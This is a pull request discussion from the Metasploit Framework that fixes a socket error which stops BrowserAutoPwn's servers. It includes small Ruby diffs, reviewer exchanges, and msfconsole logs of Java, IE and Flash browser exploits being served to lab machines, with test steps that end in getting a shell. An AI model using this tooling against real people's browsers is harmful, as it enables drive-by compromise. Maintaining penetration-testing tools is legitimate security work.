### PR TITLE
Fix #4711 - getpeername(2) error that causes BrowserAutoPwn to terminate all servers

### LINKED ISSUE #4711: Unexpected results with Browser Autopwn
Recently I was adding support to Browser Autopwn for some of the newer flashes exploits we have on framework. Work in progress here: https://github.com/jvazquez-r7/metasploit-framework/tree/flash_autopwn

When testing these first changes I noticed unexpected results when using Browser Autopwn when using the next configurations:

* Win 7 SP1 32 bits / IE 11 / Flash ActiveX 11,0,1,152.
* Win 7 SP1 32 bits / FF 35.0.1 / Flash Plugin 11,0,1,152
* Win 7 SP1 32 bits / IE 10

On my opinion there was some non-desired behavior:

* When java exploits are delivered, and java isn't installed, the browser pop-ups warnings. Browser Autopwn doesn't go ahead, keeps waiting until you click on the pop up.
* Browser Autopwn delivers the exploit, even when Java isn't installed :( I think would be less noisy to check compatible exploits before delivering them.

And some unexpected behavior:

* If you click the popups denying java installation, once the adobe_flash_pixel_bender_bof is reached, it just stops delivering more exploits (nothing on the browser). Example with IE 10 / Win 7 SP1 32 bits:

```
[*] 172.16.158.133   browser_autopwn - Handling '/fwcultQA'
[*] 172.16.158.133   browser_autopwn - Handling '/fwcultQA?sessid=V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDplbi1VUzp4ODY6TVNJRToxMC4wOg%3d%3d'
[*] 172.16.158.133   browser_autopwn - JavaScript Report: Windows 7:undefined:undefined:undefined:undefined:en-US:x86:MSIE:10.0:
[*] 172.16.158.133   browser_autopwn - Reporting: {"os.product"=>"Windows 7", "os.language"=>"en-US", "os.arch"=>"x86", "os.certainty"=>"0.7"}
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - Rejecting android/browser/webview_addjavascriptinterface for non-matching OS
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - Rejecting exploits for Firefox
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - Rejecting exploits for Firefox
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - Rejecting exploits for Opera
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - Rejecting exploits for Firefox
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - Rejecting exploits for Firefox
[*] 172.16.158.133   browser_autopwn - Responding with 18 exploits
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - * multi/browser/java_atomicreferencearray
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - * multi/browser/java_jre17_jmxbean
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - * multi/browser/java_jre17_reflection_types
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - * multi/browser/java_rhino
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - * multi/browser/java_verifier_field_access
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - * windows/browser/ie_createobject
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - * windows/browser/ms14_064_ole_code_execution
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - * multi/browser/java_jre17_provider_skeleton
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - * windows/browser/ie_cgenericelement_uaf
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - * windows/browser/ie_execcommand_uaf
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - * windows/browser/msxml_get_definition_code_exec
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - * windows/browser/adobe_flash_avm2
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - * windows/browser/adobe_flash_mp4_cprt
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - * windows/browser/adobe_flash_pixel_bender_bof
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - * windows/browser/adobe_flash_regex_value
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - * windows/browser/adobe_flash_rtmp
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - * windows/browser/ms12_004_midi
[*] 172.16.158.133   browser_autopwn - 172.16.158.133   browser_autopwn - * windows/browser/ms13_080_cdisplaypointer
[*] 172.16.158.133   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.133   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.133   java_jre17_jmxbean - handling request for /cnomLMLpJbTMm
[*] 172.16.158.133   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.133   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.133   java_jre17_jmxbean - handling request for /cnomLMLpJbTMm/
[*] 172.16.158.133   java_jre17_jmxbean - handling request for /cnomLMLpJbTMm
[*] 172.16.158.133   java_jre17_reflection_types - handling request for /nCGicTE
[*] 172.16.158.133   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.133   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.133   java_jre17_reflection_types - handling request for /nCGicTE/
[*] 172.16.158.133   java_jre17_jmxbean - handling request for /cnomLMLpJbTMm/
[*] 172.16.158.133   java_jre17_jmxbean - handling request for /cnomLMLpJbTMm
[*] 172.16.158.133   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.133   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.133   java_jre17_jmxbean - handling request for /cnomLMLpJbTMm/
[*] 172.16.158.133   java_jre17_reflection_types - handling request for /nCGicTE
[*] 172.16.158.133   java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.158.133   java_jre17_reflection_types - handling request for /nCGicTE/
[*] 172.16.158.133   java_jre17_jmxbean - handling request for /cnomLMLpJbTMm
[*] 172.16.158.133   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.133   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.133   java_jre17_reflection_types - handling request for /nCGicTE
[*] 172.16.158.133   java_jre17_jmxbean - handling request for /cnomLMLpJbTMm/
[*] 172.16.158.133   java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.158.133   java_jre17_reflection_types - handling request for /nCGicTE/
[*] 172.16.158.133   java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 172.16.158.133   java_verifier_field_access - Generated jar to drop (5506 bytes).
[*] 172.16.158.133   java_jre17_jmxbean - handling request for /cnomLMLpJbTMm
[*] 172.16.158.133   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.133   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.133   java_jre17_reflection_types - handling request for /nCGicTE
[*] 172.16.158.133   java_jre17_jmxbean - handling request for /cnomLMLpJbTMm/
[*] 172.16.158.133   java_jre17_provider_skeleton - handling request for /apCdCQtWfsBoR
[*] 172.16.158.133   java_jre17_reflection_types - handling request for /nCGicTE/
[*] 172.16.158.133   java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 172.16.158.133   java_verifier_field_access - Generated jar to drop (5506 bytes).
[*] 172.16.158.133   java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.158.133   java_jre17_provider_skeleton - handling request for /apCdCQtWfsBoR/
[*] 172.16.158.133   java_jre17_jmxbean - handling request for /cnomLMLpJbTMm
[*] 172.16.158.133   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.133   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.133   java_jre17_reflection_types - handling request for /nCGicTE
[*] 172.16.158.133   java_jre17_jmxbean - handling request for /cnomLMLpJbTMm/
[*] 172.16.158.133   java_jre17_provider_skeleton - handling request for /apCdCQtWfsBoR
[*] 172.16.158.133   java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 172.16.158.133   java_verifier_field_access - Generated jar to drop (5506 bytes).
[*] 172.16.158.133   java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.158.133   java_jre17_reflection_types - handling request for /nCGicTE/
[*] 172.16.158.133   adobe_flash_pixel_bender_bof - Gathering target information.
[*] 172.16.158.133   adobe_flash_pixel_bender_bof - Sending response HTML.
[*] 172.16.158.133   java_jre17_provider_skeleton - handling request for /apCdCQtWfsBoR/
[*] 172.16.158.133   adobe_flash_pixel_bender_bof - Request: /EhgSIqtzwKaGv/yHmTif/
[*] 172.16.158.133   adobe_flash_pixel_bender_bof - Sending HTML...
[*] 172.16.158.133   adobe_flash_pixel_bender_bof - Request: /EhgSIqtzwKaGv/yHmTif/WHYut.swf
[*] 172.16.158.133   adobe_flash_pixel_bender_bof - Sending SWF...
```

### PR DESCRIPTION
**Pull request by wchen-r7**
Fixes #4711

The problem here is that the browser sometimes will shutdown some of our exploit's connections (in my testing, all Java), and that will cause Ruby to call a rb_sys_fail with "getpeername(2)". The error goes all the way to Rex::IO::StreamServer's monitor_listener method, which triggers a "break" to quit monitoring. And then this causes another chain of reactions that eventually forces BrowserAutoPwn's servers to quit completely (while the JavaScript on the browser is still running, which sort of creates an illusion that you the module is still trying, except not really)

I also traded MS12-004 for MS13-090 because the new one should work better against XP.
## Test
- [ ] Prepare a Windows XP box (no patches, and no java)
- [ ] Start msfconsole
- [ ] `use auxiliary/server/browser_autopwn`
- [ ] `set verbose true`
- [ ] `set debug true`
- [ ] `run`
- [ ] Open IE8 (XP's latest IE) and try URL BrowserAutoPwn gave you
- [ ] You should get a shell
- [ ] You should not see any "Server stopped" messages (unless you manually exit, of course)

### CODE REVIEW

File: lib/rex/socket.rb [hunk 1]
```diff
@@ -732,7 +732,15 @@ def getlocalname
   # Return peer connection information.
   #
   def getpeername
-    return Socket.from_sockaddr(super)
+    peer_name = nil
+    begin
+      peer_name = Socket.from_sockaddr(super)
+    rescue ::Exception => e
```
Comment (jvazquez-r7) [inline lib/rex/socket.rb]: Normally, rescuing all the exceptions isn't desired. If you're trying to rescue some specific exceptions, and you know what they are, I'd say better to be more specific.

File: modules/exploits/windows/browser/ms12_004_midi.rb [hunk 2]
```diff
@@ -10,19 +10,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
-  include Msf::Exploit::Remote::BrowserAutopwn
-  autopwn_info({
-    :ua_name    => HttpClients::IE,
-    :ua_minver  => "6.0",
```
Comment (jvazquez-r7) [inline modules/exploits/windows/browser/ms12_004_midi.rb]: This one targets IE 6 and IE7. Doesn't worth to keep it?

File: lib/rex/socket.rb (hunk 1 above)
Comment (wchen-r7) [inline lib/rex/socket.rb]: The exact error I'm trying to rescue is Errno::EINVA, but I can't ```rescue Errno::EINVA``` because I keep getting an initialized error for that. So I elog everything to avoid shutting up errors.

File: modules/exploits/windows/browser/ms12_004_midi.rb (hunk 2 above)
Comment (wchen-r7) [inline modules/exploits/windows/browser/ms12_004_midi.rb]: Yeah I am not really worried about it. MS12-043 and MS12-063 and seem better and they're always the ones popping shells anyway. MS12-004 for me fails more often so I decided to replace it.

File: lib/rex/socket.rb (hunk 1 above)
Comment (jvazquez-r7) [inline lib/rex/socket.rb]: Are you sure it isn't just a typo:

```
>> ::Errno::EINVAL
=> Errno::EINVAL
>> ::Errno::EINVA
NameError: uninitialized constant Errno::EINVA
	from (irb):9:in `cmd_irb'
	from /Users/jvazquez/Projects/Code/metasploit-framework/lib/rex/ui/text/irb_shell.rb:53:in `block in run'
	from /Users/jvazquez/Projects/Code/metasploit-framework/lib/rex/ui/text/irb_shell.rb:52:in `catch'
	from /Users/jvazquez/Projects/Code/metasploit-framework/lib/rex/ui/text/irb_shell.rb:52:in `run'
	from /Users/jvazquez/Projects/Code/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:772:in `cmd_irb'
	from /Users/jvazquez/Projects/Code/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'
	from /Users/jvazquez/Projects/Code/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'
	from /Users/jvazquez/Projects/Code/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'
	from /Users/jvazquez/Projects/Code/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'
	from /Users/jvazquez/Projects/Code/metasploit-framework/lib/rex/ui/text/shell.rb:200:in `run'
	from /Users/jvazquez/Projects/Code/metasploit-framework/lib/metasploit/framework/command/console.rb:38:in `start'
	from /Users/jvazquez/Projects/Code/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
	from ./msfconsole:48:in `<main>'
```

(EINVAL ending with L)

Comment (wchen-r7) [inline lib/rex/socket.rb]: Hmm let me check again.

File: modules/exploits/windows/browser/ms12_004_midi.rb (hunk 2 above)
Comment (jvazquez-r7) [inline modules/exploits/windows/browser/ms12_004_midi.rb]: cool, makes sense, thanks

**Comment by jvazquez-r7** [comment]
I'm trying the next environment:

* Windows 7 SP1 32 bits
* IE 10 
* No java

```
[*] Using URL: http://172.16.158.1:8080/OkmP5LIn5
[*] Server started.
[*] 172.16.158.132   browser_autopwn - Handling '/OkmP5LIn5'
[*] 172.16.158.132   browser_autopwn - Handling '/OkmP5LIn5?sessid=V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDplbi1VUzp4ODY6TVNJRToxMC4wOg%3d%3d'
[*] 172.16.158.132   browser_autopwn - JavaScript Report: Windows 7:undefined:undefined:undefined:undefined:en-US:x86:MSIE:10.0:
[*] 172.16.158.132   browser_autopwn - Reporting: {"os.product"=>"Windows 7", "os.language"=>"en-US", "os.arch"=>"x86", "os.certainty"=>"0.7"}
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - Rejecting android/browser/webview_addjavascriptinterface for non-matching OS
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - Rejecting exploits for Firefox
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - Rejecting exploits for Firefox
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - Rejecting exploits for Opera
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - Rejecting exploits for Firefox
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - Rejecting exploits for Firefox
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - Rejecting windows/browser/ms13_090_cardspacesigninhelper for non-matching OS
[*] 172.16.158.132   browser_autopwn - Responding with 14 exploits
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - * multi/browser/java_atomicreferencearray
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - * multi/browser/java_jre17_jmxbean
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - * multi/browser/java_jre17_reflection_types
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - * multi/browser/java_rhino
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - * multi/browser/java_verifier_field_access
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - * windows/browser/ie_createobject
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - * windows/browser/ms14_064_ole_code_execution
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - * multi/browser/java_jre17_provider_skeleton
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - * windows/browser/ie_cgenericelement_uaf
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - * windows/browser/ie_execcommand_uaf
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - * windows/browser/msxml_get_definition_code_exec
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - * windows/browser/adobe_flash_mp4_cprt
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - * windows/browser/adobe_flash_rtmp
[*] 172.16.158.132   browser_autopwn - 172.16.158.132   browser_autopwn - * windows/browser/ms13_080_cdisplaypointer
[*] 172.16.158.132   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.132   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.132   java_jre17_jmxbean - handling request for /KRHIfaNwJA
[*] 172.16.158.132   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.132   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.132   java_jre17_jmxbean - handling request for /KRHIfaNwJA/
[*] 172.16.158.132   java_jre17_jmxbean - handling request for /KRHIfaNwJA
[*] 172.16.158.132   java_jre17_reflection_types - handling request for /ywPPaQyBUY
[*] 172.16.158.132   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.132   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.132   java_jre17_jmxbean - handling request for /KRHIfaNwJA/
[*] 172.16.158.132   java_jre17_reflection_types - handling request for /ywPPaQyBUY/
[*] 172.16.158.132   java_jre17_jmxbean - handling request for /KRHIfaNwJA
[*] 172.16.158.132   java_jre17_reflection_types - handling request for /ywPPaQyBUY
[*] 172.16.158.132   java_jre17_jmxbean - handling request for /KRHIfaNwJA/
[*] 172.16.158.132   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.132   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.132   java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.158.132   java_jre17_reflection_types - handling request for /ywPPaQyBUY/
[*] 172.16.158.132   java_jre17_jmxbean - handling request for /KRHIfaNwJA
[*] 172.16.158.132   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.132   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.132   java_jre17_jmxbean - handling request for /KRHIfaNwJA/
[*] 172.16.158.132   java_jre17_reflection_types - handling request for /ywPPaQyBUY
[*] 172.16.158.132   java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 172.16.158.132   java_verifier_field_access - Generated jar to drop (5506 bytes).
[*] 172.16.158.132   java_jre17_reflection_types - handling request for /ywPPaQyBUY/
[*] 172.16.158.132   java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.158.132   java_jre17_jmxbean - handling request for /KRHIfaNwJA
[*] 172.16.158.132   java_jre17_reflection_types - handling request for /ywPPaQyBUY
[*] 172.16.158.132   java_jre17_provider_skeleton - handling request for /uNNHurZehp
[*] 172.16.158.132   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.132   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.132   java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 172.16.158.132   java_verifier_field_access - Generated jar to drop (5506 bytes).
[*] 172.16.158.132   java_jre17_reflection_types - handling request for /ywPPaQyBUY/
[*] 172.16.158.132   java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.158.132   java_jre17_provider_skeleton - handling request for /uNNHurZehp/
[*] 172.16.158.132   java_jre17_jmxbean - handling request for /KRHIfaNwJA/
```

After it I don't get nothing else, looks like all the exploits aren't sent neither. On the target browser, I can see a message in the bottom "This website wants to install the following add-on Java(TM) SE Runtime Environment......". Is it expected? I was expecting it to continue delivering the exploits really

**Comment by wchen-r7** [comment]
Hmm let me see what might be wrong.

Your status bar from the browser might give away something.

**Comment by wchen-r7** [comment]
@jvazquez-r7 Can you set debug true and then see what happens?

**Comment by jvazquez-r7** [comment]
Sure I can

**Comment by wchen-r7** [comment]
@jvazquez-r7 I figured out what's wrong. Another workaround coming right up.

**Comment by jvazquez-r7** [comment]
aaam okey, waiting so

**Comment by wchen-r7** [comment]
Ok @jvazquez-r7, I just pushed the workaround. Please make sure you have 50c72125a4338204e3ece2162e8f7b96e4b90274, and then try again.

File: modules/exploits/windows/browser/ms14_064_ole_code_execution.rb [hunk 3]
```diff
@@ -11,17 +11,17 @@ class Metasploit4 < Msf::Exploit::Remote
...
 
-  autopwn_info({
-    :ua_name    => HttpClients::IE,
-    :ua_minver  => "3.0",
-    :ua_maxver  => "10.0",
-    :javascript => true,
-    :os_name    => OperatingSystems::Match::WINDOWS,
-    :rank       => ExcellentRanking
-  })
+  #autopwn_info({
```
Comment (jvazquez-r7) [inline modules/exploits/windows/browser/ms14_064_ole_code_execution.rb]: Can the commented lines just be deleted? Is there a good reason to let these commented lines here?

File: modules/auxiliary/server/browser_autopwn.rb [hunk 4]
```diff
@@ -236,9 +236,9 @@ def setup
       print_debug("NOTE: Debug Mode; javascript will not be obfuscated")
     else
       pre = Time.now
-      print_status("Obfuscating initial javascript #{pre}")
-      @init_js.obfuscate
-      print_status "Done in #{Time.now - pre} seconds"
+      #print_status("Obfuscating initial javascript #{pre}")
```
Comment (jvazquez-r7) [inline modules/auxiliary/server/browser_autopwn.rb]: I guess you're commenting this code because obfuscation is wasting something, right? Do you mind to add a comment explaining what is going on so others reading this code will know why this code is commented.

File: modules/exploits/windows/browser/ms14_064_ole_code_execution.rb (hunk 3 above)
Comment (wchen-r7) [inline modules/exploits/windows/browser/ms14_064_ole_code_execution.rb]: We can. I looked at other revoked browserautopwn modules and they're all the same way so I decided to go with the flow. Let me know if the workaround actually works and then I'll delete the lines.

File: modules/auxiliary/server/browser_autopwn.rb (hunk 4 above)
Comment (wchen-r7) [inline modules/auxiliary/server/browser_autopwn.rb]: That would be a good idea. But I need you to try first before I conclude that's really the problem. So let me know, please.

**Comment by jvazquez-r7** [comment]
Same behavior here after updating the branch:

```
[*] Using URL: http://172.16.158.1:8080/9e6Apq8
[*] Server started.
[*] 172.16.158.134   browser_autopwn - Handling '/9e6Apq8'
[*] 172.16.158.134   browser_autopwn - Handling '/9e6Apq8?sessid=V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDplbi1VUzp4ODY6TVNJRToxMC4wOg%3d%3d'
[*] 172.16.158.134   browser_autopwn - JavaScript Report: Windows 7:undefined:undefined:undefined:undefined:en-US:x86:MSIE:10.0:
[*] 172.16.158.134   browser_autopwn - Reporting: {"os.product"=>"Windows 7", "os.language"=>"en-US", "os.arch"=>"x86", "os.certainty"=>"0.7"}
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - Rejecting android/browser/webview_addjavascriptinterface for non-matching OS
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - Rejecting exploits for Firefox
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - Rejecting exploits for Firefox
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - Rejecting exploits for Opera
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - Rejecting exploits for Firefox
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - Rejecting exploits for Firefox
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - Rejecting windows/browser/ms13_090_cardspacesigninhelper for non-matching OS
[*] 172.16.158.134   browser_autopwn - Responding with 13 exploits
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - * multi/browser/java_atomicreferencearray
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - * multi/browser/java_jre17_jmxbean
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - * multi/browser/java_jre17_reflection_types
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - * multi/browser/java_rhino
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - * multi/browser/java_verifier_field_access
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - * windows/browser/ie_createobject
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - * multi/browser/java_jre17_provider_skeleton
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - * windows/browser/ie_cgenericelement_uaf
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - * windows/browser/ie_execcommand_uaf
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - * windows/browser/msxml_get_definition_code_exec
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - * windows/browser/adobe_flash_mp4_cprt
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - * windows/browser/adobe_flash_rtmp
[*] 172.16.158.134   browser_autopwn - 172.16.158.134   browser_autopwn - * windows/browser/ms13_080_cdisplaypointer
[*] 172.16.158.134   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.134   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.134   java_jre17_jmxbean - handling request for /idRsaEI
[*] 172.16.158.134   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.134   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.134   java_jre17_jmxbean - handling request for /idRsaEI/
[*] 172.16.158.134   java_jre17_jmxbean - handling request for /idRsaEI
[*] 172.16.158.134   java_jre17_reflection_types - handling request for /aezLTa
[*] 172.16.158.134   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.134   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.134   java_jre17_reflection_types - handling request for /aezLTa/
[*] 172.16.158.134   java_jre17_jmxbean - handling request for /idRsaEI/
[*] 172.16.158.134   java_jre17_jmxbean - handling request for /idRsaEI
[*] 172.16.158.134   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.134   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.134   java_jre17_reflection_types - handling request for /aezLTa
[*] 172.16.158.134   java_jre17_jmxbean - handling request for /idRsaEI/
[*] 172.16.158.134   java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.158.134   java_jre17_reflection_types - handling request for /aezLTa/
[*] 172.16.158.134   java_jre17_jmxbean - handling request for /idRsaEI
[*] 172.16.158.134   java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.158.134   java_jre17_reflection_types - handling request for /aezLTa
[*] 172.16.158.134   java_jre17_jmxbean - handling request for /idRsaEI/
[*] 172.16.158.134   java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 172.16.158.134   java_verifier_field_access - Generated jar to drop (5506 bytes).
[*] 172.16.158.134   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.134   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.134   java_jre17_reflection_types - handling request for /aezLTa/
[*] 172.16.158.134   java_jre17_jmxbean - handling request for /idRsaEI
[*] 172.16.158.134   java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.158.134   java_atomicreferencearray - Generated jar to drop (5506 bytes).
[*] 172.16.158.134   java_jre17_reflection_types - handling request for /aezLTa
[*] 172.16.158.134   java_jre17_jmxbean - handling request for /idRsaEI/
[*] 172.16.158.134   java_jre17_provider_skeleton - handling request for /aJmfgh
[*] 172.16.158.134   java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.158.134   java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 172.16.158.134   java_verifier_field_access - Generated jar to drop (5506 bytes).
[*] 172.16.158.134   java_jre17_reflection_types - handling request for /aezLTa/
[*] 172.16.158.134   java_jre17_provider_skeleton - handling request for /aJmfgh/
msf auxiliary(browser_autopwn) > exit -
[*] Server stopped.
[*] Server stopped.
[*] Server stopped.
[*] Server stopped.
[*] Server stopped.
[*] Server stopped.
[*] Server stopped.
[*] Server stopped.
[*] Server stopped.
[*] Server stopped.
[*] Server stopped.
[*] Server stopped.
[*] Server stopped.
[*] Server stopped.
[*] Server stopped.
[*] Server stopped.
[*] Server stopped.
[*] Server stopped.
[*] Cleaning up exploits...
[*] Server stopped.
[*] Server stopped.
[*] Server stopped.
[*] Server stopped.
AUS-MAC-0916:metasploit-framework jvazquez$ git log -1
commit 50c72125a4338204e3ece2162e8f7b96e4b90274
Author: sinn3r <wei_chen@rapid7.com>
Date:   Thu Feb 12 11:54:01 2015 -0600

    ::Errno::EINVAL, disable obfuscation, revoke ms14-064
```

**Comment by wchen-r7** [comment]
Do you see something on the browser?

**Comment by wchen-r7** [comment]
Mine goes like this:

```
[*] --- Done, found 20 exploit modules

[*] Using URL: http://0.0.0.0:8181/Shv3lCSIU
[*]  Local IP: http://192.168.1.64:8181/Shv3lCSIU
[*] Server started.
[*] 192.168.1.80     browser_autopwn - Handling '/Shv3lCSIU'
